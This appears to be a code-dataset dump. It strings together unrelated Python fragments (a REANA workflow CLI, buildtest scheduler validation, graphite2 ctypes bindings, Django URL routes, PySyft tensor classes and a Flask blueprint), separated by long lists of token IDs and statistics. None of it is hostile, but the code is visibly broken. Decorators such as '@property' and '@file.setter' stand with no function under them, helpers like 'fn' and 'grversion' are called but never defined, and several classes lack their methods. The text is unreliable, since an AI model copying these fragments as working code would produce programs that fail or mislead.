workflow=ctx.workflow_name,
access_token=access_token,
parameters=parameters,
options=options,
follow=follow,
)
@workflow_management_group.command("delete")
@click.option(
"--include-all-runs",
"all_runs",
is_flag=True,
help="Delete all runs of a given workflow.",
)
@click.option(
"--include-workspace",
"workspace",
is_flag=True,
help="Delete workspace from REANA.",
)
@add_workflow_option
@add_access_token_options
@check_connection
@click.pass_context
def workflow_delete(ctx, workflow, all_runs, workspace, access_token): # noqa: D301
"""Delete a workflow.
The `delete` command allows to remove workflow runs from the database and
the workspace. By default, the command removes the workflow and all its
cached information and hides the workflow from the workflow list. Note that
workflow workspace will still be accessible until you use
`--include-workspace` flag. Note also that you can remove all past runs of
a workflow by specifying `--include-all-runs` flag.
Example: \n
\t $ reana-client delete -w myanalysis.42 \n
\t $ reana-client delete -w myanalysis.42 --include-all-runs \n
\t $ reana-client delete -w myanalysis.42 --include-workspace
"""
from reana_client.api.client import delete_workflow, get_workflow_status
from reana_client.utils import get_api_url
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
if workflow:
try:
logging.info("Connecting to {0}".format(get_api_url()))
delete_workflow(workflow, all_runs, workspace, access_token)
if all_runs:
message = "All workflows named '{}' have been deleted.".format(
workflow.split(".")[0]
)
else:
message = get_workflow_status_change_msg(workflow, "deleted")
click.secho(message, fg="green")
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.echo(
click.style(
"Cannot delete workflow {} \n{}".format(workflow, str(e)), fg="red"
),
err=True,
)
@workflow_management_group.command("diff")
@click.argument(
"workflow_a",
default=os.environ.get("REANA_WORKON", None),
callback=workflow_uuid_or_name,
)
@click.argument("workflow_b", callback=workflow_uuid_or_name)
@click.option(
"-q",
"--brief",
is_flag=True,
help="If not set, differences in the contents of the files in the two "
"workspaces are shown.",
)
@click.option(
"-u",
"-U",
"--unified",
"context_lines",
type=int,
default=5,
help="Sets number of context lines for workspace diff output.",
)
@add_access_token_options
@check_connection
@click.pass_context
def workflow_diff(
ctx, workflow_a, workflow_b, brief, access_token, context_lines
): # noqa: D301
"""Show diff between two workflows.
The `diff` command allows to compare two workflows, the workflow_a and
workflow_b, which must be provided as arguments. The output will show the
difference in workflow run parameters, the generated files, the logs, etc.
Examples: \n
\t $ reana-client diff myanalysis.42 myotheranalysis.43 \n
\t $ reana-client diff myanalysis.42 myotheranalysis.43 --brief
"""
from reana_client.api.client import diff_workflows
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
leading_mark = "==>"
try:
response = diff_workflows(
workflow_a, workflow_b, brief, access_token, str(context_lines)
)
if response.get("reana_specification"):
specification_diff = json.loads(response["reana_specification"])
nonempty_sections = {k: v for k, v in specification_diff.items() if v}
if not nonempty_sections:
click.secho(
"{} No differences in REANA specifications.".format(leading_mark),
bold=True,
fg="yellow",
)
# Rename section workflow -> specification
if "workflow" in nonempty_sections:
nonempty_sections["specification"] = nonempty_sections.pop("workflow")
for section, content in nonempty_sections.items():
click.secho(
"{} Differences in workflow {}".format(leading_mark, section),
bold=True,
fg="yellow",
)
print_color_diff(content)
click.echo("") # Leave 1 line for separation
workspace_diff = json.loads(response.get("workspace_listing"))
if workspace_diff:
workspace_diff = workspace_diff.splitlines()
click.secho(
"{} Differences in workflow workspace".format(leading_mark),
bold=True,
fg="yellow",
)
print_color_diff(workspace_diff)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.echo(
click.style(
"Something went wrong when trying to get diff:\n{}".format(str(e)),
fg="red",
),
err=True,
)
@click.group(help="Workspace interactive commands")
def interactive_group():
"""Workspace interactive commands."""
pass
@interactive_group.command("open")
@add_workflow_option
@click.argument(
"interactive-session-type",
metavar="interactive-session-type",
default=INTERACTIVE_SESSION_TYPES[0],
type=click.Choice(INTERACTIVE_SESSION_TYPES),
)
@click.option(
"-i",
"--image",
help="Docker image which will be used to spawn the interactive session. "
"Overrides the default image for the selected type.",
)
@add_access_token_options
@check_connection
@click.pass_context
def workflow_open_interactive_session(
ctx, workflow, interactive_session_type, image, access_token
): # noqa: D301
"""Open an interactive session inside the workspace.
The `open` command allows to open interactive session processes on top of
the workflow workspace, such as Jupyter notebooks. This is useful to
quickly inspect and analyse the produced files while the workflow is stlil
running.
Examples:\n
\t $ reana-client open -w myanalysis.42 jupyter
"""
from reana_client.api.client import open_interactive_session
if workflow:
try:
logging.info("Opening an interactive session on {}".format(workflow))
interactive_session_configuration = {
"image": image or None,
}
path = open_interactive_session(
workflow,
access_token,
interactive_session_type,
interactive_session_configuration,
)
click.secho(
format_session_uri(
reana_server_url=ctx.obj.reana_server_url,
path=path,
access_token=access_token,
),
fg="green",
)
click.echo(
"It could take several minutes to start the " "interactive session."
)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.secho(
"Interactive session could not be opened: \n{}".format(str(e)),
fg="red",
err=True,
)
else:
click.secho("Cannot find workflow {}".format(workflow), fg="red", err=True)
@interactive_group.command("close")
@add_workflow_option
@add_access_token_options
@check_connection
def workflow_close_interactive_session(workflow, access_token): # noqa: D301
"""Close an interactive session.
The `close` command allows to shut down any interactive sessions that you
may have running. You would typically use this command after you finished
exploring data in the Jupyter notebook and after you have transferred any
code created in your interactive session.
Examples:\n
\t $ reana-client close -w myanalysis.42
"""
from reana_client.api.client import close_interactive_session
if workflow:
try:
logging.info("Closing an interactive session on {}".format(workflow))
close_interactive_session(workflow, access_token)
click.echo(
"Interactive session for workflow {}"
" was successfully closed".format(workflow)
)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.secho(
"Interactive session could not be closed: \n{}".format(str(e)),
fg="red",
err=True,
)
else:
click.secho("Cannot find workflow {} ".format(workflow), fg="red", err=True)
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
198,
2,
770,
2393,
318,
636,
286,
4526,
31574,
13,
198,
2,
15069,
357,
34,
8,
2177,
11,
2864,
327,
28778,
13,
198,
2,
198,
2,
4526,
31574,
318,
1479,
3788,
26,
... | 2.204176 | 20,213 |
import json
import logging
import re
from buildtest.defaults import (
DEFAULT_SETTINGS_FILE,
DEFAULT_SETTINGS_SCHEMA,
USER_SETTINGS_FILE,
)
from buildtest.exceptions import ConfigurationError
from buildtest.schemas.defaults import custom_validator
from buildtest.schemas.utils import load_recipe, load_schema
from buildtest.system import LSF, PBS, Cobalt, Slurm, system
from buildtest.utils.command import BuildTestCommand
from buildtest.utils.file import resolve_path
from buildtest.utils.tools import deep_get
logger = logging.getLogger(__name__)
class SiteConfiguration:
"""This class is an interface to buildtest configuration"""
def load(self):
"""Loads configuration file"""
self.config = load_recipe(self._file)
@property
@file.setter
def resolve(self):
"""This method will resolve path to configuration file. The order of precedence is as follows:
1. command line argument - Must be valid path
2. User Configuration: $HOME/.buildtest/config.yml
3. Default Configuration: $BUILDTEST_ROOT/buildtest/settings/config.yml
"""
self._file = (
resolve_path(self._file)
or resolve_path(USER_SETTINGS_FILE)
or DEFAULT_SETTINGS_FILE
)
def name(self):
"""Return name of matched system from configuration file"""
return self._name
def detect_system(self):
"""This method gets current system by setting ``self.target`` by matching ``hostnames`` entry
in each system list with actual system. We retrieve target hostname and determine which system configuration to use.
If no system is found we raise an error.
"""
self.systems = list(self.config["system"].keys())
host_lookup = {}
# get hostname fqdn
cmd = BuildTestCommand("hostname -f")
cmd.execute()
hostname = " ".join(cmd.get_output())
# for every system record we lookup 'hostnames' entry and apply re.match against current hostname. If found we break from loop
for name in self.systems:
host_lookup[name] = self.config["system"][name]["hostnames"]
for host_entry in self.config["system"][name]["hostnames"]:
if re.match(host_entry, hostname):
self.target_config = self.config["system"][name]
self._name = name
break
if not self.target_config:
raise ConfigurationError(
self.config,
self.file,
f"Based on current system hostname: {hostname} we cannot find a matching system {list(self.systems)} based on current hostnames: {host_lookup} ",
)
if self.target_config["executors"].get("local"):
self.localexecutors = list(self.target_config["executors"]["local"].keys())
def validate(self, validate_executors=True):
"""This method validates the site configuration with schema"""
logger.debug(f"Loading default settings schema: {DEFAULT_SETTINGS_SCHEMA}")
config_schema = load_schema(DEFAULT_SETTINGS_SCHEMA)
logger.debug(
f"Validating configuration file with schema: {DEFAULT_SETTINGS_SCHEMA}"
)
custom_validator(recipe=self.config, schema=config_schema)
logger.debug("Validation was successful")
if validate_executors:
self._executor_check()
if (
self.target_config.get("moduletool") != "N/A"
and self.target_config.get("moduletool") != system.system["moduletool"]
):
raise ConfigurationError(
self.config,
self.file,
f"Cannot find modules_tool: {self.target_config['moduletool']} from configuration, please confirm if you have environment-modules or lmod and specify the appropriate tool.",
)
def _validate_lsf_executors(self):
"""This method validates all LSF executors. We check if queue is available
and in ``Open:Active`` state.
"""
lsf_executors = deep_get(self.target_config, "executors", "lsf")
if not lsf_executors:
return
lsf = LSF()
assert hasattr(lsf, "queues")
queue_list = []
valid_queue_state = "Open:Active"
record = lsf.queues["RECORDS"]
# retrieve all queues from json record
for name in record:
queue_list.append(name["QUEUE_NAME"])
# check all executors have defined valid queues and check queue state.
for executor in lsf_executors:
queue = lsf_executors[executor].get("queue")
# if queue field is defined check if its valid queue
if queue:
if queue not in queue_list:
raise ConfigurationError(
self.config,
self.file,
f"{lsf_executors[executor]['queue']} not a valid queue!. Please select one of the following queue: {queue_list}",
)
# check queue record for Status
for name in record:
# skip record until we find matching queue
if name["QUEUE_NAME"] != queue:
continue
queue_state = name["STATUS"]
# if state not Open:Active we raise error
if not queue_state == valid_queue_state:
raise ConfigurationError(
self.config,
self.file,
f"{lsf_executors[executor]['queue']} is in state: {queue_state}. It must be in {valid_queue_state} state in order to accept jobs",
)
self.lsfexecutors.append(executor)
def _validate_slurm_executors(self):
"""This method will validate slurm executors, we check if partition, qos,
and cluster fields are valid values by retrieving details from slurm configuration.
These checks are performed on fields ``partition``, ``qos`` or ``cluster``
if specified in executor section.
"""
slurm_executor = deep_get(self.target_config, "executors", "slurm")
if not slurm_executor:
return
slurm = Slurm()
# make sure slurm attributes slurm.partitions, slurm.qos, slurm.clusters are set
assert hasattr(slurm, "partitions")
assert hasattr(slurm, "qos")
assert hasattr(slurm, "clusters")
for executor in slurm_executor:
# if 'partition' key defined check if its valid partition
if slurm_executor[executor].get("partition"):
if slurm_executor[executor]["partition"] not in slurm.partitions:
raise ConfigurationError(
self.config,
self.file,
f"{slurm_executor[executor]['partition']} not a valid partition!. Please select one of the following partitions: {slurm.partitions}",
)
query = (
f"sinfo -p {slurm_executor[executor]['partition']} -h -O available"
)
cmd = BuildTestCommand(query)
cmd.execute()
part_state = "".join(cmd.get_output())
part_state = part_state.rstrip()
# check if partition is in 'up' state. If not we raise an error.
if part_state != "up":
raise ConfigurationError(
self.config,
self.file,
f"{slurm_executor[executor]['partition']} is in state: {part_state}. It must be in 'up' state in order to accept jobs",
)
# check if 'qos' key is valid qos
if (
slurm_executor[executor].get("qos")
and slurm_executor[executor].get("qos") not in slurm.qos
):
raise ConfigurationError(
self.config,
self.file,
f"{slurm_executor[executor]['qos']} not a valid qos! Please select one of the following qos: {slurm.qos}",
)
# check if 'cluster' key is valid slurm cluster
if (
slurm_executor[executor].get("cluster")
and slurm_executor[executor].get("cluster") not in slurm.clusters
):
raise ConfigurationError(
self.config,
self.file,
f"{slurm_executor[executor]['cluster']} not a valid slurm cluster! Please select one of the following slurm clusters: {slurm.clusters}",
)
self.slurmexecutors.append(executor)
def _validate_cobalt_executors(self):
"""Validate cobalt queue property by running ```qstat -Ql <queue>``. If
its a non-zero exit code then queue doesn't exist otherwise it is a valid
queue.
"""
cobalt_executor = deep_get(self.target_config, "executors", "cobalt")
if not cobalt_executor:
return
cobalt = Cobalt()
assert hasattr(cobalt, "queues")
for executor in cobalt_executor:
queue = cobalt_executor[executor].get("queue")
# if queue property defined in cobalt executor name check if it exists
if queue not in cobalt.queues:
raise ConfigurationError(
self.config,
self.file,
f"Queue: {queue} does not exist! To see available queues you can run 'qstat -Ql'",
)
self.cobaltexecutors.append(executor)
def _validate_pbs_executors(self):
"""Validate pbs queue property by running by checking if queue is found and
queue is 'enabled' and 'started' which are two properties found in pbs queue
configuration that can be retrieved using ``qstat -Q -f -F json``. The output is in
the following format
.. code-block:: console
$ qstat -Q -f -F json
{
"timestamp":1615924938,
"pbs_version":"19.0.0",
"pbs_server":"pbs",
"Queue":{
"workq":{
"queue_type":"Execution",
"total_jobs":0,
"state_count":"Transit:0 Queued:0 Held:0 Waiting:0 Running:0 Exiting:0 Begun:0 ",
"resources_assigned":{
"mem":"0kb",
"ncpus":0,
"nodect":0
},
"hasnodes":"True",
"enabled":"True",
"started":"True"
}
}
}
"""
pbs_executor = deep_get(self.target_config, "executors", "pbs")
if not pbs_executor:
return
pbs = PBS()
assert hasattr(pbs, "queues")
for executor in pbs_executor:
queue = pbs_executor[executor].get("queue")
if queue not in pbs.queues:
raise ConfigurationError(
self.config, self.file, f"{queue} not in {pbs.queues}"
)
if (
pbs.queue_summary["Queue"][queue]["enabled"] != "True"
or pbs.queue_summary["Queue"][queue]["started"] != "True"
):
print("Queue Configuration")
print(json.dumps(pbs.queue_summary, indent=2))
raise ConfigurationError(
self.config,
self.file,
f"{queue} is not enabled or started properly. Please check your queue configuration",
)
self.pbsexecutors.append(executor)
| [
11748,
33918,
198,
11748,
18931,
198,
11748,
302,
198,
198,
6738,
1382,
9288,
13,
12286,
82,
1330,
357,
198,
220,
220,
220,
5550,
38865,
62,
28480,
51,
20754,
62,
25664,
11,
198,
220,
220,
220,
5550,
38865,
62,
28480,
51,
20754,
62,
... | 2.065371 | 5,813 |
# Copyright 2012, SIL International
# All rights reserved.
#
# This library is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation; either version 2.1 of License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should also have received a copy of the GNU Lesser General Public
# License along with this library in the file named "LICENSE".
# If not, write to the Free Software Foundation, 51 Franklin Street,
# suite 500, Boston, MA 02110-1335, USA or visit their web page on the
# internet at http://www.fsf.org/licenses/lgpl.html.
from __future__ import print_function, unicode_literals, division, absolute_import
try:
unicode
except NameError:
unicode = str
from ctypes import *
import ctypes.util
import sys, os, platform
gr2 = cdll.LoadLibrary(os.environ.get('PYGRAPHITE2_LIBRARY_PATH',
ctypes.util.find_library("graphite2")))
tablefn = CFUNCTYPE(c_void_p, c_void_p, c_uint, POINTER(c_size_t))
advfn = CFUNCTYPE(c_float, c_void_p, c_ushort)
fn('gr_engine_version', None, POINTER(c_int), POINTER(c_int), POINTER(c_int))
fn('gr_make_face', c_void_p, c_void_p, tablefn, c_uint)
fn('gr_str_to_tag', c_uint32, c_char_p)
fn('gr_tag_to_str', None, c_uint32, POINTER(c_char))
fn('gr_face_featureval_for_lang', c_void_p, c_void_p, c_uint32)
fn('gr_face_find_fref', c_void_p, c_void_p, c_uint32)
fn('gr_face_n_fref', c_uint16, c_void_p)
fn('gr_face_fref', c_void_p, c_void_p, c_uint16)
fn('gr_face_n_languages', c_ushort, c_void_p)
fn('gr_face_lang_by_index', c_uint32, c_void_p, c_uint16)
fn('gr_face_destroy', None, c_void_p)
fn('gr_face_n_glyphs', c_ushort, c_void_p)
fn('gr_face_info', POINTER(FaceInfo), c_void_p)
fn('gr_face_is_char_supported', c_int, c_void_p, c_uint32, c_uint32)
fn('gr_make_file_face', c_void_p, c_char_p, c_uint)
fn('gr_make_font', c_void_p, c_float, c_void_p)
fn('gr_make_font_with_advance_fn', c_void_p, c_float, c_void_p, advfn, c_void_p)
fn('gr_font_destroy', None, c_void_p)
fn('gr_fref_feature_value', c_uint16, c_void_p, c_void_p)
fn('gr_fref_set_feature_value', c_int, c_void_p, c_uint16, c_void_p)
fn('gr_fref_id', c_uint32, c_void_p)
fn('gr_fref_n_values', c_uint16, c_void_p)
fn('gr_fref_value', c_int16, c_void_p, c_uint16)
fn('gr_fref_label', c_void_p, c_void_p, POINTER(c_uint16), c_int, POINTER(c_uint32))
fn('gr_fref_value_label', c_void_p, c_void_p, c_uint16, POINTER(c_uint16), c_int, POINTER(c_uint32))
fn('gr_label_destroy', None, c_void_p)
fn('gr_featureval_clone', c_void_p, c_void_p)
fn('gr_featureval_destroy', None, c_void_p)
fn('gr_cinfo_unicode_char', c_uint, c_void_p)
fn('gr_cinfo_break_weight', c_int, c_void_p)
fn('gr_cinfo_after', c_int, c_void_p)
fn('gr_cinfo_before', c_int, c_void_p)
fn('gr_cinfo_base', c_size_t, c_void_p)
fn('gr_count_unicode_characters', c_size_t, c_int, c_void_p, c_void_p, POINTER(c_void_p))
fn('gr_make_seg', c_void_p, c_void_p, c_void_p, c_uint32, c_void_p, c_int, c_void_p, c_size_t, c_int)
fn('gr_seg_destroy', None, c_void_p)
fn('gr_seg_advance_X', c_float, c_void_p)
fn('gr_seg_advance_Y', c_float, c_void_p)
fn('gr_seg_n_cinfo', c_uint, c_void_p)
fn('gr_seg_cinfo', c_void_p, c_void_p, c_uint)
fn('gr_seg_n_slots', c_uint, c_void_p)
fn('gr_seg_first_slot', c_void_p, c_void_p)
fn('gr_seg_last_slot', c_void_p, c_void_p)
fn('gr_seg_justify', c_float, c_void_p, c_void_p, c_void_p, c_double, c_int, c_void_p, c_void_p)
fn('gr_slot_next_in_segment', c_void_p, c_void_p)
fn('gr_slot_prev_in_segment', c_void_p, c_void_p)
fn('gr_slot_attached_to', c_void_p, c_void_p)
fn('gr_slot_first_attachment', c_void_p, c_void_p)
fn('gr_slot_next_sibling_attachment', c_void_p, c_void_p)
fn('gr_slot_gid', c_ushort, c_void_p)
fn('gr_slot_origin_X', c_float, c_void_p)
fn('gr_slot_origin_Y', c_float, c_void_p)
fn('gr_slot_advance_X', c_float, c_void_p)
fn('gr_slot_advance_Y', c_float, c_void_p)
fn('gr_slot_before', c_int, c_void_p)
fn('gr_slot_after', c_int, c_void_p)
fn('gr_slot_index', c_uint, c_void_p)
fn('gr_slot_attr', c_int, c_void_p, c_void_p, c_int, c_uint8)
fn('gr_slot_can_insert_before', c_int, c_void_p)
fn('gr_slot_original', c_int, c_void_p)
fn('gr_slot_linebreak_before', None, c_void_p)
(major, minor, debug) = grversion()
if major > 1 or minor > 1 :
fn('gr_start_logging', c_int, c_void_p, c_char_p)
fn('gr_stop_logging', None, c_void_p)
else :
fn('graphite_start_logging', c_int, c_void_p, c_int)
fn('graphite_stop_logging', None)
| [
2,
220,
220,
220,
15069,
2321,
11,
47551,
4037,
198,
2,
220,
220,
220,
1439,
2489,
10395,
13,
198,
2,
198,
2,
220,
220,
220,
770,
5888,
318,
1479,
3788,
26,
345,
460,
17678,
4163,
340,
290,
14,
273,
13096,
198,
2,
220,
220,
220,... | 2.181034 | 2,204 |
from pydantic import BaseModel, Field
import numpy as np
from ..units import Pressure, Temperature, CriticalProperties
| [
6738,
279,
5173,
5109,
1330,
7308,
17633,
11,
7663,
198,
11748,
299,
32152,
355,
45941,
198,
6738,
11485,
41667,
1330,
30980,
11,
34467,
11,
17684,
2964,
18200,
198
] | 4.25 | 28 |
try:
import unittest
except ImportError:
import unittest2 as unittest
from sys import version_info
from mpegdash.parser import MPEGDASHParser
| [
28311,
25,
198,
220,
220,
220,
1330,
555,
715,
395,
198,
16341,
17267,
12331,
25,
198,
220,
220,
220,
1330,
555,
715,
395,
17,
355,
555,
715,
395,
198,
198,
6738,
25064,
1330,
2196,
62,
10951,
198,
6738,
285,
431,
21287,
1077,
13,
... | 3.04 | 50 |
# Copyright 2018 Gehtsoft USA LLC
# Licensed under the license derived from the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://fxcodebase.com/licenses/open-source/license.html
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import __main__
import datetime
import traceback
import argparse
import sys
from forexconnect import fxcorepy
logging.basicConfig(filename='{0}.log'.format(__main__.__file__), level=logging.INFO,
format='%(asctime)s %(levelname)s %(message)s', datefmt='%m.%d.%Y %H:%M:%S')
console = logging.StreamHandler(sys.stdout)
console.setLevel(logging.INFO)
logging.getLogger('').addHandler(console)
# function for print available descriptors
| [
2,
15069,
2864,
2269,
4352,
4215,
4916,
11419,
198,
198,
2,
49962,
739,
262,
5964,
10944,
422,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
220,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
11846,
35... | 3.287425 | 334 |
import logging
from django.core.management.base import BaseCommand, CommandError
from ngw.extensions.matrix import matrix
| [
11748,
18931,
198,
198,
6738,
42625,
14208,
13,
7295,
13,
27604,
13,
8692,
1330,
7308,
21575,
11,
9455,
12331,
198,
198,
6738,
23370,
86,
13,
2302,
5736,
13,
6759,
8609,
1330,
17593,
628
] | 3.787879 | 33 |
from django.conf.urls import include
from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
# path('searchableselect/', include('searchableselect.urls')),
path('', include('page.urls')),
path('game/', include('game.urls')),
path('client/', include('client.urls')),
path('auth/', include('social_django.urls', namespace='social'))
]
| [
6738,
42625,
14208,
13,
10414,
13,
6371,
82,
1330,
2291,
198,
6738,
42625,
14208,
13,
3642,
822,
1330,
13169,
198,
6738,
42625,
14208,
13,
6371,
82,
1330,
3108,
198,
198,
6371,
33279,
82,
796,
685,
198,
220,
220,
220,
3108,
10786,
284... | 2.791946 | 149 |
import json
import re
import torch
import random
import syft as sy
from ... import utils
from . import utils as torch_utils
import logging
import numpy as np
class _SyftTensor(object):
"""
Super class for all Syft tensors, that contains all the specific syft functions
"""
def set_id(self, new_id):
"""
This changes the id of a tensor.
:param new_id: a string or integer id
:return: returns self, for convenience.
"""
if(new_id not in self.owner._objects):
if not hasattr(self, 'old_ids'):
self.old_ids = set()
self.old_ids.add(self.id)
self.owner.register_object(self, new_id)
return self
else:
raise KeyError("There is already a tensor with that ID - please choose another.")
@property
@parent.setter
@classmethod
def handle_call(cls, command, owner):
"""
Receive a command and an owner and before sending it downward the syft chain,
Performs different operations like:
- command substitution
- args substitution
- command overloading with special methods or arguments
"""
attr = command['command']
args = command['args']
kwargs = command['kwargs']
has_self = command['has_self']
# Overload methods
if has_self and cls.is_overloaded_method(attr):
self_ = command['self']
result = getattr(self_, attr)(*args, **kwargs)
# Overload functions
elif not has_self and cls.is_overloaded_function(attr):
overload_function = cls.overload_functions.get(attr)
result = overload_function(*args, **kwargs)
else:
# replace a function attr with an existing other
if attr in cls.replaced_functions():
command['command'] = cls.replaced_functions(attr)
# Or do whatever you want, but be careful not to overwrite the args!
# (...)
# Get the next node type and update in command tensorvar with tensorvar.child
next_command, child_type = torch_utils.prepare_child_command(
command, replace_tensorvar_with_child=True)
# Forward the call to the next child
result = child_type.handle_call(next_command, owner)
if result is None:
return result
if not isinstance(result, (int, float, str, bool)):
# Insert the new node just before the wrapper
syft_response = cls.syft_wrap(result, owner)
else:
syft_response = result
return syft_response
def ser(self, private, as_dict=True):
"""
General method for serializing a Syft object. Specific tensors like _PointerTensor
should overload this method.
"""
data = {
'owner': self.owner.id,
'id': self.id,
'torch_type': self.torch_type
}
if self.child is not None and not torch_utils.is_tensor(self.child):
data['child'] = self.child.ser(private, as_dict)
if as_dict:
return {'__{}__'.format(self.__class__.__name__): data}
else:
return json.dumps({'__{}__'.format(self.__class__.__name__): data}) + "\n"
@classmethod
def deser_routing(cls, dct, worker, acquire):
"""
Method analysing the dict given to see which Syft Tensor should deserialized,
and forwarding the call
[Is this case note that the dct param is assumed to have a single key, which is
compatible with our encode/decode process (ex: {'___PointerTensor__': {...} })]
"""
pat = re.compile('__(.+)__')
for key, obj in dct.items(): # A trick, we don't really loop
obj_type = pat.search(key).group(1)
if torch_utils.is_syft_tensor(obj_type):
if obj_type == '_LocalTensor':
return sy._LocalTensor.deser(obj, worker, acquire)
elif obj_type == '_PointerTensor':
return sy._PointerTensor.deser(obj, worker, acquire)
else:
syft_type = torch.guard['syft.' + obj_type]
return syft_type.deser(obj, worker, acquire)
@classmethod
def deser(cls, msg_obj, worker, acquire):
"""
General method for de-serializing a Syft object. Specific tensors like _PointerTensor
should overload this method.
"""
if acquire: # We need to register the info given
syft_obj = cls(child=None,
parent=None,
torch_type=msg_obj['torch_type'],
owner=worker,
id=msg_obj['id'],
skip_register=True
)
if 'child' in msg_obj:
syft_child = cls.deser_routing(msg_obj['child'], worker, acquire)
syft_obj.child = syft_child
syft_child.parent = syft_obj
else: # We point at the info which generally we can't really have
# We make sure we are not creating a duplicate pointer
previous_pointer = worker.get_pointer_to(msg_obj['owner'], msg_obj['id'])
if previous_pointer is None:
syft_obj = sy._PointerTensor(child=None,
parent=None,
torch_type=msg_obj['torch_type'],
location=msg_obj['owner'],
id_at_location=msg_obj['id'],
owner=worker,
id=None,
skip_register=True)
else:
syft_obj = previous_pointer
return syft_obj
def on(self, wrapper):
"""
Used to add a new node at the top of the chain, just before the tensorvar wrapper
Example with _PlusIsMinusTensor:
x = sy.FloatTensor([1, 2, 3]) # the chain is FloatTensor > _LocalTensor
x = sy._PlusIsMinusTensor().on(x) # the chain is FloatTensor > _PlusIsMinusTensor > _LocalTensor
"""
cls = type(self)
# Assign the newly created tensor to the good owner and torch_type
self.torch_type = wrapper.child.torch_type
self.owner = wrapper.child.owner
# Insert self between wrapper and wrapper child
torch_utils.wrap_command_with(wrapper.child, wrapper=self)
torch_utils.wrap_command_with(self, wrapper=wrapper)
# In case wrapper is a variable, do the same with data and grad (if necessary)
if torch_utils.is_variable(wrapper):
wrapper.data = cls().on(wrapper.data)
if torch_utils.is_variable(wrapper.grad):
wrapper.grad = cls().on(wrapper.grad)
if wrapper.grad is None and wrapper.data.dim() > 0:
# create an empty envelope in wrapper.grad
wrapper.init_grad_()
# Build the chain with _PlusIsMinusTensor
wrapper_grad = cls().on(wrapper.grad)
# Insert the gradient within its chain
wrapper.grad.native_set_(wrapper_grad)
return wrapper
def wrap(self):
"""
Wrap a syft node with a torch wrapper
"""
wrapper = torch.guard[self.torch_type]()
self.owner.rm_obj(wrapper.child.id)
wrapper.child = self
torch_utils.fix_chain_ends(wrapper)
return wrapper
@classmethod
def syft_wrap(cls, result, owner):
"""
Wrap a torch node with a syft wrapper
"""
# Insert the new syft node just before the wrapper
syft_wrapper = cls(child=result, owner=owner)
result.parent = syft_wrapper
if torch_utils.is_variable(result.torch_type):
syft_response_data = cls(child=result.data, owner=owner)
result.data.parent = syft_response_data
syft_wrapper.data = syft_response_data
# TODO: same for grad ?
return syft_wrapper
@classmethod
def is_overloaded_method(cls, attr):
"""
State if a function name corresponds to a Syft Tensor method which
overloads a torch method
"""
exclude = ['on', '__init__', 'native___init__', '__repr__', '__str__', 'create_pointer',
'ser', 'deser', 'handle_call']
if attr in exclude:
return False
if hasattr(getattr(cls, attr), '__module__') \
and getattr(cls, attr).__module__ == 'syft.core.frameworks.torch.tensor':
return True
return False
@classmethod
def is_overloaded_function(cls, attr):
"""
State if a function name corresponds to an overloaded function by the Syft
tensor, which declared the corresponding overloading function in
cls.overload_functions
"""
attr = attr.split('.')[-1]
overloaded_functions = [
func for func in dir(cls.overload_functions)
if re.match(r'__(.*)__', func) is None
and func != 'get'
]
return attr in overloaded_functions
@classmethod
def replaced_functions(cls, attr=None):
"""
If attr is none, return all the function substitution a Syft Tensor class
wants to perform.
Else, return the substitution corresponding to attr
"""
if attr is None:
return cls.substitution_table
else:
return cls.substitution_table[attr]
substitution_table = {}
class _PlusIsMinusTensor(_SyftTensor):
"""
Example of a custom overloaded _SyftTensor
Role:
Converts all add operations into sub/minus ones.
"""
# The table of command you want to replace
substitution_table = {
'torch.add': 'torch.add'
}
class overload_functions:
"""
Put here the functions you want to overload
Beware of recursion errors.
"""
@staticmethod
@staticmethod
# Put here all the methods you want to overload
def add(self, arg):
"""
Overload the add method and execute another function or method with the provided args
"""
_response = self.sub(arg)
return _response
def abs(self):
"""
Overload the abs() method and execute another function
"""
return torch.abs(self)
class _TorchObject(object):
"""
This tensor is simply a more convenient way to add custom
functions to all Torch tensor types, including Torch Variable.
Note that it is the parent class of the two following classes:
_TorchTensor and a_TorchVariable
"""
__module__ = 'syft'
def move(self, worker, new_id=None):
"""
Give the end leaf of the chain to worker,
just like if the last elmt was send its child
to worker
self->alice->obj [worker] => self->alice->worker->obj
"""
raise NotImplementedError('Move is not supported anymore.')
if isinstance(worker, (int, str)):
worker = self.owner.get_worker(worker)
if new_id is None:
new_id = random.randint(0, 10e10)
if isinstance(self.child, sy._PointerTensor):
pointer = self.child
else:
pointer = None
if pointer is None:
return self.send(worker, new_id)
command, _ = pointer.compile_command('move',
(worker.id, new_id),
{},
True)
response = pointer.owner.send_torch_command(recipient=pointer.location,
message=command)
return self
| [
11748,
33918,
198,
11748,
302,
198,
11748,
28034,
198,
11748,
4738,
198,
11748,
827,
701,
355,
827,
198,
6738,
2644,
1330,
3384,
4487,
198,
6738,
764,
1330,
3384,
4487,
355,
28034,
62,
26791,
198,
11748,
18931,
198,
11748,
299,
32152,
3... | 2.137064 | 5,647 |
from dataCheck import customerDataCheck
import json
from auth.flaskAuthVerify import tokenVerify
from flask import Blueprint, Response, g
from postgres.databaseConnection import PostgresControll
manager = Blueprint('getSpecJobHistory', __name__, url_prefix='/jobs')
